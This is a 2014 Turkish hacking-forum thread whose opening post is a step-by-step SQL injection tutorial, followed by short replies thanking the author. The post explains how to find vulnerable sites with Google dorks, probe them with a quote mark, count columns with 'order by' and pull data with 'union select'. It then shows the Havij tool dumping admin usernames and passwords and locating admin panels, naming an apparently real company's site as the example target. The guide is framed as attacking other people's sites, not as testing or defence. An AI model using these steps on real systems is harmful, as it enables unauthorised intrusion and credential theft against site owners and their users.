THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

SQL Açığı Bulma Ve Hackleme [THT]

ALemdar' - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2013
Nereden:
İstanbul
Mesajlar:
2.389
Konular:
653
Teşekkür (Etti):
1008
Teşekkür (Aldı):
993
Ticaret:
(0) %
28-05-2014 13:04
#1
Post
SQL Açığı Bulma Ve Hackleme [THT]
SQL Nedir ?


# SQL (Structured Query Language) veritabanından bilgi çekme silme vb. gibi işlemler yapabilen bir dildir. Bulunduğumuz zamanda çoğu web sitelerinin alt yapılarında bu veritabanı vardır.
# SQL en yaygın olan güvenlik açığıdır ve çok tehlikelidir.
# SQL hazır scriptler (vbulletin,vb.) gibi yüksek güvenlik testlerinden geçirilmez.
# Bu web siteleri vertibanı ile anlaşmaları için SQL’e ihtiyaç duyarlar.

SQL İnjection Nedir?



# SQL İnjection bir SQL açıklı siteye uygulanan İnjection türüdür.

SQL İnjection Olan Sayfayı Nasıl Bulabilirim ?



# SQL açığı olan bir sayfa bulabilmemiz için bize bir dork lazım bu dorku THT forumdan ya da Google amcadan bulabiliriz. Örnek bir Dork: inurl:galery.php?id= inurl:index.php?id=.


SQL İnjection’u Hangi Sayfalarada Kullanabilirim ?



# SQL İnjection’u kullanabilmamiz için sayfa url’sinde bize

id=değer", "search=değer" gibi değişken değerleri alabilen ifadeler lazımdır.


SQL İnjection’u Nasıl Kullanabilirim ?


# Evet Google’dan dorkumuzu arattık sayfalar çıktı başlıyoruz sayfaları gezmeye gezdiğimiz sayfalarda

# URL’nin sonunda php?id=45 veya daha farklı bir sayı yazar bu sayıların sonuna tırnak işareti (’) koyuyoruz.

# Örnek: www.örneksite.com/php?id=120 site bu sitede id değerimiz gördüğünüz gibi 220 id değerinin sonuna ’ işaretimizi koyuyoruz ve Enter’lıyoruz.

www.örneksite.com/php?id=120'

Sitede bir hata verirse :


Warning: include(../inc/content220\\\\\\\\\\\\\\\\’.inc.php) [function.include]: failed to open stream: No such file or directory in /homepages/6/d27097856/htdocs/www.fanatec.de/html/index.php on line 162

Warning: include() [function.include]: Failed opening ’../inc/content220\\\\\\\\\\\\\\\\’.inc.php’ for inclusion (include_path=’.:/usr/lib/php5’) in /homepages/6/d27097856/htdocs/www.fanatec.de/html/index.php on line 162

Bunun gibi bir hata alırsak sitede bir SQL açığı vardır.


SQL Açığını Nasıl Kullanabiliriz ?



# SQL açığını bulduktan sonra sıra geldi İnjection yapamaya İnjection’u 2 türlü yapabiliriz.


1. Havij ve benzeri programlar ile

2. Manuel olarak

Manuel SQl inj Havijin yaptığı elle yapılanıdır.


Manuel olarak SQL İnjection Nasıl Yapılır ?



# Evet sitemizde kolon sayısını bulacağız bunun için ordey+by+ veya group+by+ komutunu kullanacağız

www.örneksite.com/php?id=120+order+by+100 bu yüz sayısını misal veriyorum.

Bu sayıyı gittikçe azaltıcağız.Taa ki hatamız gidene kadar.

www.örneksite.com/php?id=120+order+by+95

www.örneksite.com/php?id=120+order+by+40

www.örneksite.com/php?id=120+order+by+7

evet diyelimki 7 de hatamız gitti yani kolon sayımız 7’dir.

Şimdi Kolonları ekrana yansıtmaya geldi sır****olon sayımız 7’idi.

Bunun için union+select+... kodumuzu kullanacağız.


http://www.örneksite.com/php?id=120+...+0,1,2,3,4,5,6

yazıyoruz.Kolon sayımız 7 olduğu için 7’ye kadar yazıyoruz.

Evet diyelimki 1 ve 5 kolonları yansıdı ekrana.

Not: Unutmadan bir not’da geçelim eğer kolonlar ekrana yansımaz ise URL’mizin sonuna -- ifadesini eklemeliyiz.

Havij Yolu ile SQL İnjection Nasıl Yapılır ?
indirmek için link : indir

# Evet SQL açıklı sitemizi bulduk. Fanatec.com sitemiz buydu bu şekilde Havij’e yapıştırıyoruz.

Analyze diyoruz Analyze ettikden sonra Tables diyoruz



Tables dedikten sonra Get Tables diyi kolonları çekiyoruz.

Çektikten sonra admin_pass’ı seçip Get Columns diyoruz


Admin_pass ı açtıktan sonra username ve password seçeneğine tıklayıp Get data diyoruz ve username şifre elimizde



Admin panelini bulmak istiyorsak Find Admin’e tıklayıp URL’mizi yapıştırdıktan sonra Start diyoruz ve Admin paneli elimizde




[THT]
--------------------- Melâli anlamayan nesle âşinâ değiliz.
Sana yalnız bir ince tâze kadın
Bana yalnızca eski bir budala
,
Ahmet Haşim
Blue-Moon, realmaysa, Amy Root, storm4599 Teşekkür etti.
ByPro55 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2014
Nereden:
world..
Mesajlar:
842
Konular:
101
Teşekkür (Etti):
23
Teşekkür (Aldı):
228
Ticaret:
(0) %
28-05-2014 14:23
#2
Eline sağlık.İşime yaradı.
Blue-Moon - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2013
Nereden:
./systemdown
Mesajlar:
2.065
Konular:
613
Teşekkür (Etti):
364
Teşekkür (Aldı):
522
Ticaret:
(0) %
28-05-2014 15:31
#3
Eline Sağlık.
yldzemre088 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2014
Mesajlar:
752
Konular:
231
Teşekkür (Etti):
39
Teşekkür (Aldı):
78
Ticaret:
(0) %
28-05-2014 15:31
#4
eline saglık
ALemdar' - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2013
Nereden:
İstanbul
Mesajlar:
2.389
Konular:
653
Teşekkür (Etti):
1008
Teşekkür (Aldı):
993
Ticaret:
(0) %
28-05-2014 15:32
#5
Eyvallah. sağolun beyler
--------------------- Melâli anlamayan nesle âşinâ değiliz.
Sana yalnız bir ince tâze kadın
Bana yalnızca eski bir budala
,
Ahmet Haşim
Rèd-Kiit . - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
07/2012
Nereden:
Realtek.exe
Yaş:
27
Mesajlar:
13.558
Konular:
4019
Teşekkür (Etti):
2519
Teşekkür (Aldı):
3754
Ticaret:
(0) %
28-05-2014 15:35
#6
Anlatım İyi Ellerine Sağlık .
--------------------- Ben Müslümanım ve benim dinim mükemmel.Eğer bir hata yaptıysam beni yargıla, dinimi değil.


]
realmaysa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2014
Mesajlar:
74
Konular:
16
Teşekkür (Etti):
19
Teşekkür (Aldı):
21
Ticaret:
(0) %
28-05-2014 15:48
#7
Eline saglik.
--------------------- Düsmanlarınızi Affedin Fakat İsimlerini Sakın Unutmayın.
Amy Root - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2014
Mesajlar:
1.554
Konular:
442
Teşekkür (Etti):
449
Teşekkür (Aldı):
403
Ticaret:
(0) %
28-05-2014 18:49
#8
Eline sağlık güzel anlatım olmuş
---------------------
Bir süre çevrimdışı olacağım aşağıdaki mail adresinden ulaşabilirsiniz.
arootcontact@gmail.com
CyberShooter - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2014
Mesajlar:
420
Konular:
38
Teşekkür (Etti):
65
Teşekkür (Aldı):
136
Ticaret:
(0) %
28-05-2014 21:54
#9
yazan ellerin dert görmesin çok saol kardeş
gencaslan21 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2013
Nereden:
Not Found
Mesajlar:
2.069
Konular:
359
Teşekkür (Etti):
169
Teşekkür (Aldı):
324
Ticaret:
(0) %
28-05-2014 22:15
#10
Güzel Anlatım Olmuus - Yeterince Açıklayıcı ,
- Ama Artık Havij'den Pek Fazla Sonuç Alınamıyor - Manuel Çözümleme En İyisi
---------------------
Son update

Yeni İsim : Black Lifee


TurkHackTeam.net/org

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler